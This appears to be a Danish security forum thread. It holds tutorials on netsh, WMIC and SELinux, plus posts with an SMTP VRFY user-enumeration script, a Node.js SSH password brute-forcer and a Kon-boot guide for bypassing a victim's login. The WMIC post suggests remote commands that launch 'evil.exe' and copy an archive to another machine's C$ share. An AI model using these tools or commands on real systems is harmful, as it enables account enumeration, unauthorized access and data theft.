show helper - Viser alle hjælpeprogrammer på øverste niveau.
show mode - Viser den aktuelle tilstand.

Kommandoer i denne kontekst:
show interface - Viser grænseflader.
netsh interface>show interface

Admin-tilst. Tilstand Type Grænsefladenavn
-------------------------------------------------------------------------
Aktiveret Forbindelsen er oprettet Dedikeret VirtualBox Host-Only Network
Deaktiveret Afbrudt Dedikeret LAN-forbindelse 2
Aktiveret Afbrudt Dedikeret Trådløs netværksforbindelse
Aktiveret Forbindelsen er oprettet Dedikeret LAN-forbindelse

netsh interface>exit

C:\Windows\System32>

Man kan få context baseret hjælp ved at skrive "?". Man forlader en context med "..", og afsluttet netsh shell med "exit".
Bemærk at "?" både viser nedarvede kommandoer, og kommandoer der kun kan bruges i den aktuelle context.

Citer:C:\Windows\System32>netsh
netsh>interface
netsh interface>?

Følgende kommandoer er tilgængelige:

Arvede kommandoer fra konteksten netsh:
.. - Skifter et niveau op.
abort - Annullerer ændringer foretaget i offline-tilstand.
add - Føjer en konfigurationspost til en liste over poster.
advfirewall - Ændringer til 'netsh advfirewall'-konteksten.
alias - Tilføjer et alias.
bridge - Ændringer til 'netsh bridge'-konteksten.
...
winhttp - Ændringer til 'netsh winhttp'-konteksten.
winsock - Ændringer til 'netsh winsock'-konteksten.
wlan - Ændringer til 'netsh wlan'-konteksten.

Kommandoer i denne kontekst:
6to4 - Ændringer til 'netsh interface 6to4'-konteksten.
? - Viser en liste over kommandoer.
dump - Viser et konfigurationsscript.
help - Viser en liste over kommandoer.
...
show - Viser oplysninger.
tcp - Ændringer til 'netsh interface tcp'-konteksten.
teredo - Ændringer til 'netsh interface teredo'-konteksten.

Følgende underkontekster er tilgængelige:
6to4 httpstunnel ipv4 ipv6 isatap portproxy tcp teredo

For at se hjælp til en kommando skal du skrive kommandoen efterfulgt af
et mellemrum og derefter skrive ?.

netsh interface>..

netsh>exit

C:\Windows\System32>

Links:
http://en.wikipedia.org/wiki/Netsh
Microsoft TechNet - Netsh

WMI - Windows Management Instrumentation - Et par eksempler

Sun, 24 May 2015 20:40:08 +0200

Her er en lille "Få blod på tanden" - intro til WMI. Det er et kanon godt værktøj, til at administrere Windows med.
Jeg er ikke selv god til det, så det er også lidt en "note-to-selv".

WMIC er WMI command & scripting værktøj, der man mere end lidt af hvert. Uden at vide det, tror jeg det er meget overset, lige som Powershell og VBScripting. Det er selvfølgelig også interessant, hvis man får en shell på en windows maskine.

Arbejde med brugere:
Jeg opretter først en bruger ned "net", for at have noget at arbejde med. Det kan sikkert gøres med WMI også.

Citer:C:\Windows\system32>net user hacker hacker /comment:"Test user" /add
Kommandoen blev udført.

C:\Windows\system32>net users

Brugerkonti for \\ASUS

-------------------------------------------------------------------------------
Administrator Gæst hacker
xxxx UpdatusUser
Kommandoen blev udført.

C:\Windows\system32>

C:\Windows\system32>wmic /node:127.0.0.1 USERACCOUNT WHERE Name="hacker" GET Description
Description
Test user

C:\Windows\system32>

Man kan også se, hvad man kan vælge at se, ud over Description, ved at bruge et wildcard:

Citer:C:>wmic /node:127.0.0.1 USERACCOUNT WHERE Name="hacker" GET *

Outputtet kan være lidt rodet, så man kan sætte en formatering på:

Citer:C:\>wmic /node:127.0.0.1 USERACCOUNT WHERE Name="hacker" GET * /Format:list

AccountType=512
Caption=asus\hacker
Description=Test user
Disabled=FALSE
Domain=asus
FullName=
InstallDate=
LocalAccount=TRUE
Lockout=FALSE
Name=hacker
PasswordChangeable=TRUE
PasswordExpires=TRUE
PasswordRequired=TRUE
SID=S-1-5-21-3146295476-1160783222-2073417647-1006
SIDType=1
Status=OK

C:\>

Man kan faktisk fjerne "/node:", men en af de smarte ting er, at man kan requeste disse informationer over lokalneværket.

Citer:C:>wmic USERACCOUNT WHERE Name="hacker" GET * /Format:list

En remote request ville se således ud:

Citer:C:>wmic /user:administrator /password: /node:10.0.0.2 USERACCOUNT WHERE Name="hacker" GET *

Hvis man ønsker at se alle brugere, kan man bruge følgende:

Citer:C:\>wmic Useraccount GET /ALL /Format:list
AccountType=512
Caption=asus\xxxx
Description=
Disabled=FALSE
Domain=asus
FullName=
InstallDate=
LocalAccount=TRUE
Lockout=FALSE
Name=mian
PasswordChangeable=TRUE
PasswordExpires=FALSE
PasswordRequired=FALSE
SID=S-1-5-21-3146295476-1160783222-2073417647-1001
SIDType=1
Status=OK

AccountType=512
Caption=asus\UpdatusUser
Description=Brugt til at give NVIDIA-softwareopdateringer
Disabled=FALSE
Domain=asus
FullName=UpdatusUser
InstallDate=
LocalAccount=TRUE
Lockout=FALSE
Name=UpdatusUser
PasswordChangeable=TRUE
PasswordExpires=FALSE
PasswordRequired=TRUE
SID=S-1-5-21-3146295476-1160783222-2073417647-1004
SIDType=1
Status=OK

C:\>

Den bruger vi lavede før, kan slettes med:

Citer:C:\Windows\system32>net user hacker /del
Kommandoen blev udført.

C:\Windows\system32>

Hvis man vil undersøge Eventloggen, kan man også det.
Vi kan først lige lave et Informations-event under Applications:

Citer:C:\Windows\system32>eventcreate /t information /l application /id 925 /d "Some Description"

LYKKEDES: Der blev oprettet en hændelse af typen 'information' i logfilen 'application' med 'EventCreate' som kilde.

C:\Windows\system32>

Det kan så undersøges med WMI med følgende: (Ja, det tager bare lang tid)

Citer:C:\Windows\system32>wmic /node:127.0.0.1 NTEVENT WHERE EventIdentifier=925 GET Message
Message
Some Description

C:\Windows\system32>

Her kan man selvfølgelig også bruge * som wildcard, i stedet for Message, for at se alle felter. Yderligere kan man tilføje et output format:

Citer:C:\>wmic NTEVENT WHERE EventIdentifier=925 GET * /Format:list

Category=0
CategoryString=
ComputerName=asus
Data=
EventCode=925
EventIdentifier=925
EventType=3
InsertionStrings={"Some Description"}
Logfile=Application
Message=Some Description
RecordNumber=2916083
SourceName=EventCreate
TimeGenerated=20150524163323.000000-000
TimeWritten=20150524163323.000000-000
Type=Oplysninger
User=asus\mian

C:\>

Over netværk, ville det se således ud:

Citer:wmic /user:administrator /password: /node: NTEVENT WHERE EventIdentifier=925 Get * /Format:list

Man kan også lave sub-queries:

Citer:C:\>wmic process WHERE (Caption="svchost.exe" AND ThreadCount=10) GET * /format:list

Caption=svchost.exe
CommandLine=C:\Windows\system32\svchost.exe -k DcomLaunch
CreationClassName=Win32_Process
CreationDate=20150521153146.471614+120
CSCreationClassName=Win32_ComputerSystem
CSName=ASUS
Description=svchost.exe
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Handle=828
HandleCount=416
InstallDate=
KernelModeTime=311533997
MaximumWorkingSetSize=1380
MinimumWorkingSetSize=200
Name=svchost.exe
OSCreationClassName=Win32_OperatingSystem
...

Som i kan se, får man hurtigt rigtig meget output. Man kan så vælge at sende output til en fil, i et bestemt format, ved hjælp af "/Format:" og "/output:".
Nedenstående smider outputtet i filen svc.html, og som i kan se ud af /format:, så ER indholdet faktisk i html format.

Citer:C:>wmic /output:svc.html process where (Caption="svchost.exe" AND ThreadCount=10) get * /format:hform

Output filen kan så åbnes i din favorit browser med "file:///C:/svc.html".

Man kan også se maskinens patchlevel:

Citer:C:\>wmic qfe GET description,installedOn /format:list
...
Description=Service Pack
InstalledOn=2/18/2011

Description=Update
InstalledOn=9/19/2014

C:\>

Hvis man synes det er bedre, kan man sende dette output ud på skærmen i cvs format:

Citer:C:\>wmic qfe GET description,installedOn /format:csv

Node,Description,InstalledOn
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Update,9/19/2014
ASUS,Security Update,3/31/2011
ASUS,Security Update,3/31/2011
ASUS,Security Update,3/31/2011
...

Eller evt. til en fil, med argumentet "/Output", som vi så før.

Vil man se udvalgte informationer om operativsystems processer, kan man prøve følgende:

Citer:C:\>wmic Process GET caption,executablepath,commandline /Format:list
...
Caption=SearchFilterHost.exe
CommandLine="C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532
ExecutablePath=C:\Windows\system32\SearchFilterHost.exe

Caption=WmiPrvSE.exe
CommandLine=C:\Windows\system32\wbem\wmiprvse.exe
ExecutablePath=C:\Windows\system32\wbem\wmiprvse.exe

Caption=WMIC.exe
CommandLine=wmic Process GET caption,executablepath,commandline /Format:list
ExecutablePath=C:\Windows\System32\Wbem\WMIC.exe

C:\>

Som altid, kan man se de felter man ønsker. Hvis man vil se det hele, kan man bruge * som et wildcard.

Man kan også se services med WMI. Her ses den fulde sti til den ekesekverbare fil:

Citer:C:\Windows\system32>wmic.exe service GET pathname
PathName
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\system32\svchost.exe -k netsvcs
"C:\Windows\system32\FBAgent.exe"
C:\Windows\System32\alg.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
...

Man kan også se alle services, formateret i en liste:

Citer:C:\>wmic.exe service GET * /Format:list
...
AcceptPause=FALSE
AcceptStop=FALSE
Caption=WWAN AutoConfig
CheckPoint=0
CreationClassName=Win32_Service
Description=Denne tjeneste administrerer datakort eller integrerede modulkort for mobile bredbånd (GSM & CDMA) og forbindelser ved at konfigurere netværket a
utomatisk. Det anbefales på det kraftigste, at denne tjeneste bliver ved med at køre for at opnå den bedste brugeroplevelse i forbindelse med mobile bredbåndsenh
eder.
DesktopInteract=FALSE
DisplayName=WWAN AutoConfig
ErrorControl=Normal
ExitCode=1077
InstallDate=
Name=WwanSvc
PathName=C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
ProcessId=0
ServiceSpecificExitCode=0
ServiceType=Share Process
Started=FALSE
StartMode=Manual
StartName=NT Authority\LocalService
State=Stopped
Status=OK
SystemCreationClassName=Win32_ComputerSystem
SystemName=ASUS
TagId=0
WaitHint=0
...

Her ses et udvalg af kolonner, formateret som en tabel:

Citer:C:\Windows\system32>wmic.exe service GET ProcessId,Caption /Format:table
Caption ProcessId
Adobe Acrobat Update Service 1860
Application Experience 0
AFBAgent 1224
Gatewaytjeneste til programlaget 0
Program-id 0
Programoplysninger 548
...

Man kan også starte nye processer. Ser ses, hvordan ping startes. Selve outputtet vil poppe op i et nyt kommandoprompt vindue:

Citer:C:\>wmic.exe process call create "ping -t google.dk"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 10476;
ReturnValue = 0;
};

C:\>

Så man man overveje hvad man kan bruge følgende til:

Citer:C:>wmic /NODE: process CALL create “evil.exe”

Eller måske:

Citer:C:>wmic /NODE: /user:”Domain\Administrator” /password: process CALL create “xcopy “C:\\everything.rar” “\\\\C$\\everything.rar”

Man kan også se hvad for noget software, der er installeret på maskinen:

Citer:C:\Windows\system32>wmic product list brief
...
Java Auto Updater {4A03706F-666A-4037-7777-5F2748764D10} Java Auto Updater
Oracle Corporation 2.8.45.14
Cisco Systems VPN Client 5.0.07.0440 {5FDC06BF-3D3D-4367-8FFB-4FAFCB61972D} Cisco Systems VPN Client 5.0.07.0440
Cisco Systems, Inc. 5.0.7
ASUS Power4Gear Hybrid {9B6239BF-4E85-4590-8D72-51E30DB1A9AA} ASUS Power4Gear Hybrid
ASUS 1.1.44
SDFormatter {179324FF-7B16-4BA8-9836-055CAAEE4F08} SDFormatter
SD Association 4.0.0

C:\Windows\system32>

Eller de ting, der starter automatisk på maskinen:

Citer:C:\Windows\system32>wmic startup list brief
Caption Command User
Sidebar %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun NT AUTHORITY\LOKAL TJENESTE
Sidebar %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun NT AUTHORITY\NETVÆRKSTJENESTE
TeraTerm Menu TeraTerm Menu.lnk asus\xxxx
...
IgfxTray "C:\Windows\system32\igfxtray.exe" Public
HotKeysCmds "C:\Windows\system32\hkcmd.exe" Public
Persistence "C:\Windows\system32\igfxpers.exe" Public
iTunesHelper "C:\Program Files\iTunes\iTunesHelper.exe" Public

C:\Windows\system32>

Oversigt over partitioner:

Citer:C:\Windows\system32>wmic partition get name,bootable,size,type
Bootable Name Size Type
FALSE Disk #0, Partition #0 26842497024 Installable File System
TRUE Disk #0, Partition #1 223213707264 Installable File System

C:\Windows\system32>

Oversigt over diskdrev:

Citer:C:\Windows\system32>wmic diskdrive get name,size,model
Model Name Size
Samsung SSD 840 Series \\.\PHYSICALDRIVE0 250056737280

C:\Windows\system32>

Informationer om netkort:

Citer:C:\Windows\system32>wmic nic get macaddress,description
Description MACAddress
WAN Miniport (SSTP)
WAN Miniport (IKEv2)
WAN Miniport (L2TP)
WAN Miniport (PPTP)
WAN Miniport (PPPOE)
WAN Miniport (IPv6)
WAN Miniport (Network Monitor)
Qualcomm Atheros AR9002WB-1NG Wireless Network Adapter 74:2F:68:9C:7A:30
WAN Miniport (IP)
VirtualBox Host-Only Ethernet Adapter 08:00:27:00:70:E1
RAS Async Adapter
Apple Mobile Device Ethernet
VirtualBox Bridged Networking Driver Miniport
Microsoft ISATAP-netværkskort
Atheros AR8151 PCI-E Gigabit Ethernet Controller (NDIS 6.20) 14:DA:E9:C4:9F:21
Deterministic Network Enhancer Miniport
Microsoft Teredo Tunneling-adapter
...
Deterministic Network Enhancer Miniport 12:8C:20:52:41:53
Cisco Systems VPN Adapter for 64-bit Windows
Deterministic Network Enhancer Miniport
VirtualBox Bridged Networking Driver Miniport 14:DA:E9:C4:9F:21
VirtualBox Bridged Networking Driver Miniport 74:2F:68:9C:7A:30
Microsoft ISATAP-netværkskort

C:\Windows\system32>

Man kan også bruge WMIs prompt, ved at skrive "wmic" uden noget andet.

Citer:C:\Windows\System32>wmic
wmic:root\cli>partition get name,bootable,size,type
Bootable Name Size Type
FALSE Disk #0, Partition #0 26842497024 Installable File System
TRUE Disk #0, Partition #1 223213707264 Installable File System

wmic:root\cli>exit

C:\Windows\System32>

Links:
http://en.wikipedia.org/wiki/Windows_Man...umentation

Test af valide brugere via SMTP og VRFY fra linux bash

Mon, 18 May 2015 17:16:51 +0200

Hvis man har brug for at teste om en bruger har en mailkonto på en given mail server, kan man bruge nedenstående script til at teste om brugeren findes.

Scriptet kaldes med:

Citer:./mailusers.sh users.txt mail.example.com > valid.txt

Filen users.txt har en liste af formodede gyldige brugernavne. Måske er disse gættet, rippet fra en hjemmeside, fundet med TheHarvester, eller lign.

mail.example.com er den mailserver man ønsker at teste op i mod.
Outputtet bliver sendt til filen "valid.txt".

#!/bin/bash

# Kaldes med ./mailusers.sh   > output.txt



for user in $(cat $1);

    do

    echo "vrfy $user" | nc -q 2 $2 25 | grep "^252 " | cut -f3 -d" " &

    done

mailusers.sh skal selvfølgelig gøres eksekverbar med:

Citer:$ chmod u+x mailusers.sh

Jeg håber nogen kan bruge det. Det er sådan set ret simpelt.
Når scriptet er forbundet til mail serveren med netcat på port 25, udsteder det en "vrfy ".
Hvis brugeren findes, giver mail serveren en returkode "252", hvilket betyder at brugeren findes og hvis brugeren ikke findes, gives en returkode "550".

Simpel Bruteforce test

Sat, 28 Mar 2015 02:11:04 +0100

Brug denne simpel test til at se om din server tager forhold til bruteforcing.
Scriptet kræver NodeJS, og bibliotek: simple-ssh og randomstring, som kan installeres via npm install simple-ssh og npm install randomstring

Kode:
/* 

Use this test for seeing the important logs of bruteforce attacks in /var/log/auth.log .

Please use this on own risk!! If your linux box got the security, you might get banned from your own linux box. 

Use this as a tester for auto-blocking robots that are trying to bruteforcing into your SSH.

libraries used: simple-ssh and randomstring.

*/ 

var SSH = require('simple-ssh');

var randomstring = require("randomstring");

var triedOut = [];

var theRandomVariable;

var arrayContains = function(pRandomString){

    var i = triedOut.length;

    while (i--) {

       if (triedOut[i] === pRandomString) {

           return true;

       }

    }

    return false;

}

var getRandomPassword = function(){

    theRandomVariable = randomstring.generate(12);

    if(arrayContains(theRandomVariable)){

        console.log("Exists in array " + theRandomVariable);

        getRandomPassword();

    } else {

        return randomstring.generate(12);

    }

}

var startSSH = function(){

    var aRandomPassword = getRandomPassword();

    var ssh = new SSH({

        host: '<< HOST IP >>',

        port: '<< HOST PORT / DEFAULT 22 >>',

        user: '<< HOST USER / DEFAULT ROOT >>',

        pass: aRandomPassword,

    });

    ssh.exec("ls", {

         out: function(stdout) {

            console.log(stdout);

            console.log("Got in! Used password: " + aRandomPassword);

        }

    }).start();

    ssh.on('error', function(err) {

        console.log('Did not get in.');

        console.log('Tried out: ' + aRandomPassword);

        console.log(err);

        if(aRandomPassword !== undefined){

            triedOut.push(aRandomPassword);

        }

        ssh.end();

        startSSH();

        console.log(triedOut.length);

    });

}

startSSH();

Hvis du har nogen forslag, ændringer eller bare +1 postcount, så skriv løs :)

[Begynder] Bypass let Windows og OS X account passwords

Wed, 07 Jan 2015 17:50:17 +0100

Hej, jeg faldt over dette smarte værktøj her for nyligt og selvom mange af jer nok kender det i forvejen ville jeg lige dele en guide med jer til hvordan det fungerer.

Bemærk det er en af mine første tutorials så hvis layoutet eller lign. er forkert undskylder jeg!

Krav:
Adgang til ofrets computer, fysisk!
Et USB stik, SD kort, CD eller lign.
Den rigtige version af Kon-boot

Hvad er kon-boot?
Kon-boot er værktøjet vi kommer til at bruge.
Det er et værktøj det udskifter passwordet på ofrets computer med et tomt felt, altså trykker du bare ENTER og så er du inde.

Hvordan får man kon-boot?

Spoiler (Click to View)

Klargør Kon-boot

Spoiler (Click to View)

Brug af Kon-boot

Spoiler (Click to View)

Har du problemer så smid en kommentar eller en PM, så vil jeg se hvad jeg kan gøre :)

//Serty

SELinux 101

Sun, 14 Dec 2014 04:50:13 +0100

Under SELinux, køres systemet med MAC, Mandatory Access Control, hvor man uden SELinux kører Discresionary Acces Control.
Kort fortalt er DAC, de typiske Read, Write og Execute permissions, man kan sætte for root, brugere og "other".
Der er selvfølgelig untagelse, hvis man f.eks. kører med ACLs, som man også kan i Linux.
MAC tilbyder et miljø, der default har Deny på alt, og alt der skal kunne tilgå noget, skal have en Allow policy.

Der findes følgende fire forskellige måder at køre SELinux på:

Citer:Selinux 4 access control forms:
- Targeted Enforcement (TE)
- Strict - (TE bare mere strict)
- Role Based Access Control (RBAC)
- Multi-Level Access (MLS)

MCS er en Multi Category System og er en overbygning på MLS. Denne intro til SELinux dækker kun TE, selv om kommandoerne sådan set, er de samme.

SELinux er bygget op omkring Labels. Alt får en label, og denne fortæller, hvad der tillades.

Hvis man vil undersøge, hvilken label en fil har, kan man ikke bruge ls -l, som ellers sidder i fingrene hos de fleste:

Citer:root@selinux:~# ls -l
totalt 4
-rw-r--r--. 1 root root 11 dec 13 22:42 text.txt
root@selinux:~#

Man kan dog se, der er kommet et punktun efter "-rw-r--r--", altså "-rw-r--r--.", og dette viser, filerne på dette system, har fået labels.
Det er her, man ville se et +, hvis systemet kørte med Access Lists.
Vi er så heldige, at tegnet Z, ikke bruges i så forfærdelig mange kommandoer på linux, og derfor bliver dette brugt til at vise labels med i SELinux.

Citer:root@selinux:~# ls -Z
unconfined_u:object_r:user_home_t:SystemLow text.txt
root@selinux:~# ls -lZ
totalt 4
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 11 dec 13 22:42 text.txt
root@selinux:~#

Får du ikke dette output, kan du kontrollere at SELinux kører med:
root@selinux:~# check-selinux-installation
/etc/pam.d/login is not SELinux enabled

Citer:root@selinux:~# sestatus
SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: default
Current mode: enforcing
Mode from config file: enforcing
Policy MLS status: enabled
Policy deny_unknown status: denied
Max kernel policy version: 26
root@selinux:~#

Hvis du ikke har behov for al informationen, som ovenstående kommando giver, kan man nøjes med at bruge "getenforce":

Citer:root@selinux:~# getenforce
Enforcing
root@selinux:~#

Denne viser dog ikke, om SELinux vil køre, efter en reboot.

Alt har labels, når man har aktiveret SELinux. Både filer, sockets, processes, brugere osv.
Her er et eksempel på hvordan root ser ud lige nu:

Citer:root@selinux:~# id -Z
unconfined_u:unconfined_r:unconfined_t:SystemLow-SystemHigh
root@selinux:~# id
uid=0(root) gid=0(root) grupper=0(root) kontekst=unconfined_u:unconfined_r:unconfined_t:SystemLow-SystemHigh
root@selinux:~#

Her er den kørende Apache2 process:

Citer:root@selinux:~# ps -efZ |grep apache
system_u:system_r:httpd_t:s0 root 2184 1 0 21:54 ? 00:00:00 /usr/sbin/apache2 -k start
system_u:system_r:httpd_t:s0 www-data 2187 2184 0 21:54 ? 00:00:00 /usr/sbin/apache2 -k start
system_u:system_r:httpd_t:s0 www-data 2188 2184 0 21:54 ? 00:00:00 /usr/sbin/apache2 -k start
system_u:system_r:httpd_t:s0 www-data 2189 2184 0 21:54 ? 00:00:00 /usr/sbin/apache2 -k start
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 root 2720 2597 0 22:51 pts/0 00:00:00 grep apache
root@selinux:~#

Brugere i SELinux er dog ikke det samme som, den bruger man logger ind med. Flere linux brugere, kan være under samme SELinux bruger. Lidt som en gruppe af brugere, deler nogle rettigheder.
En Process kaldes i SELinux for et "subject", og filer, directories, FIFOs, sockets osv., er "objects". Så subjects arbejder på objects, når man benytter SELinux.
En label er i "context", når de er assosieret med en fil, og i et "domain", hvis en label er assosieret med en process.
Hvis vi ønsker at se, hvilke SELinux brugere og roller, der er configureret, kan vi gøre det med semanage:

Citer:root@selinux:~# semanage user -l

Labeling MLS/ MLS/
SELinux User Prefix MCS Level MCS Range SELinux Roles

root sysadm SystemLow SystemLow-SystemHigh staff_r sysadm_r system_r
staff_u staff SystemLow SystemLow-SystemHigh staff_r sysadm_r
sysadm_u sysadm SystemLow SystemLow-SystemHigh sysadm_r
system_u user SystemLow SystemLow-SystemHigh system_r
unconfined_u unconfined SystemLow SystemLow-SystemHigh system_r unconfined_r
user_u user SystemLow SystemLow user_r
root@selinux:~#

Hvis man ønsker at tildele en bruger, en bestemt rolle, kan det gøres således:

Citer:root@selinux:~# semanage login -a -s staff_u mian
root@selinux:~#

Som vi kan se fra ovensstående eksempl med apache2, er en label delt op i flere dele: user:role:type:level.
Hvis det ser lidt underligt ud, at apache2 både kører som root og www-data, er det fordi, Apache2 virker sådan.
Apache2 starter som root, så det kan læse certifikater osv., når den starter, den degraderer så sine egne rettigheder til www-data brugeren, og kører med den.
Apache2 har følgende label: system_u:system_r:httpd_t:s0.
System_u = user, system_r = role, httpd_t = type og s0 er adgangsniveauet.
Adgangsniveauet bruges ikke sønderligt i SELinux, når man kører Targeted Enforcement (TE), men er en form for adgangsniveau opdeling, f.eks. s0-s15 hvor S0 kunne svare til Public Information og S15 kunne være Top Secret.
Nogle ses som C0-c1023.

Her er et andet eksempel:

Citer:root@selinux:~# ls -lZ /etc/resolv.conf
-rw-r--r--. 1 root root system_u:object_r:net_conf_t:SystemLow 38 dec 13 22:47 /etc/resolv.conf
root@selinux:~#

Kører man Permissive eller Enforcing SELinux bør alt have en label, og det er ufarligt at skifte mellem disse to modes.
Man skal dog passe på med at gå direkte fra at have SELinux Disabled, til Enforced, for så er det ikke sikkert, alle labels er på plads og korrekte.
Der er flere måder at få sat labels på alt, på:

Citer:#fixfiles relabel // Gør dette på et kørende system
#touch /.autorelabel // Findes "/.autorelabel" filen, bliver der dannet labels ved reboot.
#fixfiles onboot // Denne schedulerer en relabel ved næste reboot. Effektivt det samme som at danne en /.autorelabel fil.

Hvis man vil ekskludere nogle filer fra at blive relabeled af fixfiles, kan disse angives i "/etc/selinux/fixfiles_exclude_dirs". Det er ikke sikkert, filen findes på forhånd.

Brugerfiler og bruger processes, vil ofte være labeled unconfinded_u, hvor systemfiler og system processes, ofte vil have system_u i stedet. Det kan også være user_u.
Hvis noget kører uden en targeted policy, vil det formegentlig køre unconfined_u.

De fleste distributioner har haft SELinux i mange år, og nogle kommer faktisk i dag, med en Permissive SELinux.
Det betyder også at når man installerer pakker, så får man, til lagt de fleste, færdiglavede policies med, og skal ikke tænke på at lave dem selv.
Lige det, hjælper ikke udviklere, som laver deres egne programmer, compiler et program fra source, eller bruger en tar ball.
Hvordan sætter vi så disse labels? Det er der flere svar på. Jeg vil starte med et typisk pitfall, før vi dykker ned i detaljerne.
SELinux labels flytter på samme måde som DAC permissions gør.

Når man opretter en ny fil, arver sin context fra det directory, den ligger i.
Flytter man en fil, vil filens context flytte med. Så man skal være varsom, hvis man flytter filer fra en context til en anden.
Hvis man kopierer en fil, og destinationsfilen allerede eksisterer, vil den nye fil, overtage den gamle fils label. Altså hvis man kopierer ovenpå den eksisterende.
Kopierer man en fil, og den ikke allerede findes, der hvor den kopieres hen, svarer det til en ny fil, og filen vil arve sin context, fra det directory, filen kommer til at ligge i, efter kopieringen.

Hvis man f.eks. selv har compilet nmap, som har brug for lidt flere rettigheder, end de andre filer man har i /usr/bin/, vil nmap arve sin context, eller få en label, ud fra, den context, /usr/bin mappen har.
Det kan man formegntlig ikke få nmap til at køre med, og det kan vi ændre på flere forskellige måder.
Vi kan bruge "chcon", som står for Change Context, eller vi kan bruge "semanage". Nedenstående to kommandoer gør det samme:

Citer:#chcon --type traceroute_exec_t /usr/bin/nmap // Change Context type traceroute_exec_t for /usr/bin/nmap
#semanage fcontext -a -t traceroute_exec_t /usr/bin/nmap // Add filecontext type traceroute_exec_t for /usr/bin/nmap

Bemærk at _t i traceroute_exec_t står for type, så derfor bruger vi -t for type, eller --type.

Får man ændret noget, man ikke ville have ændret, kan man bruge "restorecon" til at restore den originale context for den fil, man har ændret:

Citer:#restorecon /usr/bin/nmap

Man kan selvfølgelig også bruge chcon og restorecon rekursivt, hvis det er nødvendigt. Det kan være brugbart, hvis man f.eks. har fået rodet for meget i /var/www.
Så kan man rekursivt genskabe sin context med kommandoen:

Citer:#restorecon -R /var/www

Her er et eksempel på, hvordan en fil ændres fra type user_home_t til etc_t, og herefter tilbage:

Citer:root@selinux:~# ls -lZ
totalt 4
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 11 dec 13 22:42 text.txt
root@selinux:~# chcon --type etc_t ./text.txt
root@selinux:~# ls -lZ
totalt 4
-rw-r--r--. 1 root root unconfined_u:object_r:etc_t:SystemLow 11 dec 13 22:42 text.txt
root@selinux:~# restorecon ./text.txt
root@selinux:~# ls -lZ
totalt 4
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 11 dec 13 22:42 text.txt
root@selinux:~#

Hvis man har lavet en ny fil der hedder foo.html, kan man sætte dens context, ved at henvise til det directory, filen ligger i.
Den er meget tilsvarende de andre metoder:

Citer:#chcon --reference /var/www/html /var/www/html/foo.html

OBS: chcon er i deb pakken coreutils og semanage er i policycoreutils. Man kan også kaste et blik på man eller info page for genhomedircon og setfiles kommandoerne.

Hvis man ønsker at bruge sin home folder, til webindhold, som man ofte gør, hvis man bruger vhosts til hjemmesider, kan man sætte disse filer til typen httpd_sys_content_t.

Citer:#semanage fcontext -a -t httpd_sys_content_t "/home/bob/html(/.*)?" // Bemærk at i en shell, vil udsagn i gåseøjne, bliver fortolket.

Det kan også være man ønsker at have nogle CGIs tilgængelig, for at skabe noget dynamisk indhold:

Citer:#semanage fcontext -a -t httpd_sys_script_exec_t "/home/bob/html/cgi-bin(/.*)?"

En ting man støder på, hvis man f.eks. flytter sine html filer til sit home dir, er at webserveren vil blive nægtet adgang.
Dette skyldes af apache2 kører i en anden context end din home folder:

Citer:root@selinux:/var/www# ls -lZ
totalt 4
-rw-r--r--. 1 root root system_u:object_r:httpd_sys_content_t:SystemLow 177 dec 13 20:00 index.html
root@selinux:/var/www# ls -lZ /root
totalt 4
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 11 dec 13 22:42 text.txt
root@selinux:/var/www#

En home folder har en helt anden label. typen er user_home_t, hvor den i /var/www/ er httpd_sys_content_t.
For ikke at ødelægge det for meget for sig selv, kan man med fordel benytte sig af SELinux booleans.
Det er en form for shortcuts, som enten kan være slået til eller fra. Eller det var engang, og det lader vi som om, det stadig er.
For at give apache2 adgang til sit hjemmedrev, kan man sætte en boolean som hedder httpd_enable_homedirs.
Dette kan, som det meste andet, gøres på flere måder. Nedenstående kommandoer gør det samme:

Citer:#semanage boolean -m --on httpd_enable_homedirs
#setsebool httpd_enable_homedirs on // Sættes til off ved næste reboot.
#setsebool -P httpd_enable_homedirs on // Permanent sat til on

Som man kan se her under, fortæller de ikke noget, når det går godt.

Citer:root@selinux:~# setsebool -P httpd_enable_homedirs on
root@selinux:~# setsebool -P httpd_enable_homedirs off
root@selinux:~# echo $?
0
root@selinux:~#

Der er rigtig mange af disse booleans, og disse kan ses med semanage, eller getsebool kommandoerne. Hvis man f.eks. ønsker at tillade CGI, kan man tilføle en "grep" sammen med kommandoerne.
Her er et par eksempler med de to kommandoer. Man kan se, de har forskelligt output:

Citer:root@selinux:/var/www# getsebool -a |grep cgi
httpd_enable_cgi --> off
root@selinux:/var/www# semanage boolean -l |grep cgi
httpd_enable_cgi (off , off) httpd_enable_cgi
root@selinux:/var/www#

For at få en idé om, hvilke booleans der er, er det bare at køre en af ovenstående kommandoer, uden at smide det i gennem grep.

OBS: setsebool og getsebool er i pakken policycoreutils, lige som semanage.

En anden ting man sikkert vil støde på, er at apache2 kun må lytte på port 80 og 443. Det er godt hvis det er en prod server, alle kan tilgå fra Inetnettet.
Hvis det f.eks. lykkes en hacker at uploade netcat og er han nød til at sætte den til at lytte på en anden port end 80 eller 443, da apache bruger disse to.
